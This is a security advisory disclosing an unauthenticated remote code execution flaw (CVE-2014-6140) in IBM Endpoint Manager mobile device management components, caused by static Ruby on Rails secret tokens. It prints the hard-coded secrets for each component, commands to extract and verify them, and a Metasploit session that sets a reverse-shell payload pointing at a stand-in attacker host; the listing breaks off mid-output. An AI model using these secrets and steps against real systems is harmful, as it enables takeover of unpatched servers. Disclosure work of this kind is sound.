Advisory: Unauthenticated Remote Code Execution in IBM Endpoint Manager
Mobile Device Management Components
During a penetration test, RedTeam Pentesting discovered that several
IBM Endpoint Manager Components are based on Ruby on Rails and use
static secret_token values. With these values, attackers can create
valid session cookies containing marshalled objects of their choosing.
This can be leveraged to execute arbitrary code when the Ruby on Rails
application unmarshals the cookie.
Details
=======
Product: IBM Endpoint Manager for Mobile Devices
Affected Components: Enrollment and Apple iOS Management Extender,
Mobile Device Management Self-Service Portal,
Mobile Device Management Admin Portal and
Trusted Service Provider
Affected Versions: All versions prior to 9.0.60100
Fixed Versions: 9.0.60100
Vulnerability Type: Unauthenticated Remote Code Execution
Security Risk: high
Vendor URL: http://www-03.ibm.com/
software/products/en/
ibmendpmanaformobidevi
http://www-01.ibm.com/support/
docview.wss?uid=swg21691701
Vendor Status: fixed version released
Advisory URL: https://www.redteam-
pentesting.de/advisories/rt-
sa-2014-012
Advisory Status: published
CVE: CVE-2014-6140
CVE URL: https://cve.mitre.org/cgi-bin/
cvename.cgi?name=CVE-2014-6140
Introduction
============
"IBM Endpoint Manager for Mobile Devices provides a completely integrated
approach for managing, securing, and reporting on laptops, desktops,
servers, smartphones, tablets, and even specialty devices such as
point-of-sale terminals. This provides customers with unprecedented
real-time visibility and control over all devices employees use in their
daily job functions; reducing costs, increasing productivity, and
improving compliance."
(from the vendor's homepage)
More Details
============
IBM Endpoint Manager for Mobile Devices is part of the IBM Endpoint
Manager (IEM, formerly Tivoli Endpoint Manager, or TEM) product family.
Several components related to mobile device management can be installed
either on the main TEM Server, or on so-called TEM Relays, and are then
accessible via HTTPS at port 443 of the respective system, such as:
Path Component
/ Enrollment and Apple iOS Management Extender
/ssp/ Mobile Device Management Self-Service Portal
/ap/ Mobile Device Management Admin Portal
/tsp/ Trusted Service Provider
When issuing HTTP requests to any of these paths, the respective server
responds in a manner similar to the following example:
$ curl -skI https://tem.example.com/
HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
X-UA-Compatible: IE=Edge,chrome=1
[...]
Set-Cookie: _mdm_session=
BAh7B0kiD3Nlc3Npb25faWQGOgZFRk
kiJThjZjZjYTIxNjU
wODg1ODFiMTYxY2FmYTBhNjA0ODM3B
jsAVEkiEF9jc3JmX3Rva2VuBjsARkk
iMTQ2S2V3blNnQ1cxeGpaN1hSM0hLM
jY1ZUFpT21rbDFvL2RhUk41eDN2OTQ
9BjsARg%3D%3D--
e48265ee63dd90381caa92248d2716
2f67b1ea06;
path=/; secure; HttpOnly
[...]
X-Rack-Cache: miss
Content-Length: 0
Server: Jetty(8.1.14.v20131031)
While the Server header indicates that the web applications are hosted
on a Jetty Java application server, the X-Rack-Cache header and the
cookie format are typically used by Ruby on Rails applications. The
cookie is in fact a Base64 encoded marshalled Ruby object protected by
an HMAC (the hexadecimal value following the two dashes). The cookie
value can be unmarshalled as follows:
$ ruby -e 'puts Marshal.load("
BAh7B0kiD3Nlc3Npb25faWQGOgZFRk
kiJThjZjZj'\
'
YTIxNjUwODg1ODFiMTYxY2FmYTBhNj
A0ODM3BjsAVEkiEF9jc3JmX3Rva2Vu
BjsARkkiM'\
'
TQ2S2V3blNnQ1cxeGpaN1hSM0hLMjY
1ZUFpT21rbDFvL2RhUk41eDN2OTQ9B
jsARg==".'\
'unpack("m0")[0])'
{"session_id"=>"
8cf6ca2165088581b161cafa0a6048
37",
"_csrf_token"=>"
46KewnSgCW1xjZ7XR3HK265eAiOmkl
1o/daRN5x3v94="}
To create a cookie with a valid HMAC requires knowledge of a secret
stored on the application server. In Ruby on Rails version 3
applications, this value is normally stored in the variable secret_token
that is set in the file config/initializers/secret_
token.rb. It is good
practice to generate these values randomly when an application is
installed. The IBM Endpoint Manager components, however, use static
values that are the same across all installations. These values can be
determined by manually inspecting the web application archives (e.g.
ap.war, ios.war, ssp.war, tsp.war) installed into the directory
C:\Program Files\BigFix Enterprise\Management Extender\MDM Provider\webapps
of the respective server. The Enrollment and Apple iOS Management
Extender, for example, is contained in the file ios.war. The archive
contains a Ruby on Rails web application that was compiled to Java class
files. The secret token needed for calculating the HMAC is contained in
the file WEB-INF/config/initializers/
secret_token.class:
$ strings WEB-INF/config/initializers/
secret_token.class \
| egrep -o '[0-9a-f]{128}'
65c0eb133b2c8481b08b41cfc0969c
bdd540f3c1ce0fd66be2d24ffc97d0
9730d11d53e0
2cac31753721610ad7dc00f6f9942e
3825fd4895a4e2805712fa6365
It can be verified that this secret is used for generating the HMAC that
protects the cookie value by using the OpenSSL command line utility to
calculate an HMAC of the aforementioned Base64 encoded data:
$ echo -n '
BAh7B0kiD3Nlc3Npb25faWQGOgZFRk
kiJThjZjZjYTIxNjUwODg1ODFiMT'\
'
YxY2FmYTBhNjA0ODM3BjsAVEkiEF9j
c3JmX3Rva2VuBjsARkkiMTQ2S2V3bl
NnQ1cxeG'\
'
paN1hSM0hLMjY1ZUFpT21rbDFvL2Rh
Uk41eDN2OTQ9BjsARg=='\
| openssl dgst -sha1 -hmac '
65c0eb133b2c8481b08b41cfc0969c
bdd540f3c1'\
'
ce0fd66be2d24ffc97d09730d11d53
e02cac31753721610ad7dc00f6f994
2e3825fd'\
'4895a4e2805712fa6365'
(stdin)= e48265ee63dd90381caa92248d2716
2f67b1ea06
The resulting value is identical to the HMAC originally appended to the
cookie. Once the secret is known, arbitrary cookie values can be crafted
and sent to the respective application for further processing. As
demonstrated by Metasploit's rails_secret_deserialization exploit
module[0], this can be leveraged into executing arbitrary code on the
application server (see also Proof of Concept below).
For reference, the following cookie names and secret_token values were
identified for the different web applications:
Enrollment and Apple iOS Management Extender
Path: /
Cookie: _mdm_session
Secret: 65c0eb133b2c8481b08b41cfc0969c
bdd540f3c1ce0fd66be2d24ffc97d0
9730
d11d53e02cac31753721610ad7dc00
f6f9942e3825fd4895a4e2805712fa
6365
Mobile Device Management Self-Service Portal
Path: /ssp/
Cookie: _self-service-portal_session
Secret: c5f5da7e3ae1baa9a10f4429b5e7c8
aec217b3b53851272bd8f533d47aca
de48
0863a810630039c7987b04ff70c125
512e74a998f8a028080c05265a97c7
47a3
Mobile Device Management Admin Portal
Path: /ap/
Cookie: _admin-portal_session
Secret: 2556dea5fbbd90c4a79202a43bdf9b
d4c391c67159d021ea8bc478f29801
d024
78acb273c2f425cf487c27669af5db
c3fdaf7f870e23a0a544dee04ab216
9220
Trusted Service Provider
Path: /tsp/
Cookie: _trusted-services-provider_
session
Secret: b52a3979462299e3a11f6c7c893a98
0f312fa8e5944fb8fdc74a400c5567
7aed
ba00ce6df9e2d9ef1525c6ab68a2b6
dca9e9ba557c0c6d579a1325ec6338
178b
Exploiting the Trusted Service Provider application was not tested, due
to the lack of a properly configured testing environment. However, it is
a Ruby on Rails web application deployed to the Jetty application server
just like the other applications so that it is likely also vulnerable.
This was confirmed by the vendor.
Proof of Concept
================
The following listing shows a sample Metasploit session demonstrating
the execution of arbitrary code through the Enrollment and Apple iOS
Management Extender application:
------------------------------
------------------------------
------------
msf > use exploit/multi/http/rails_
secret_deserialization
msf exploit(rails_secret_
deserialization) > set PAYLOAD ruby/shell_reverse_tcp
PAYLOAD => ruby/shell_reverse_tcp
msf exploit(rails_secret_
deserialization) > set LHOST attacker.example.com
LHOST => attacker.example.com
msf exploit(rails_secret_
deserialization) > set RHOST tem.example.com
RHOST => tem.example.com
msf exploit(rails_secret_
deserialization) > set RPORT 443
RPORT => 443
msf exploit(rails_secret_
deserialization) > set SSL true
SSL => true
msf exploit(rails_secret_
deserialization) > set SSLVERSION TLS1
SSLVERSION => TLS1
msf exploit(rails_secret_
deserialization) > set SECRET 65c0eb133b2c8481
b08b41cfc0969cbdd540f3c1ce0fd6
6be2d24ffc97d09730d11d53e02cac
31753721610a
d7dc00f6f9942e3825fd4895a4e280
5712fa6365
SECRET => 65c0eb133b2c8481b08b41cfc0969c
bdd540f3c1ce0fd66be2d24ffc97d0
97
30d11d53e02cac31753721610ad7dc
00f6f9942e3825fd4895a4e2805712
fa6365
msf exploit(rails_secret_
deserialization) > set PrependFork false
PrependFork => false
msf exploit(rails_secret_
deserialization) > exploit
[*] Started reverse handler on attacker.example.com:4444<br style="background-color: white; color: #222222; font-fami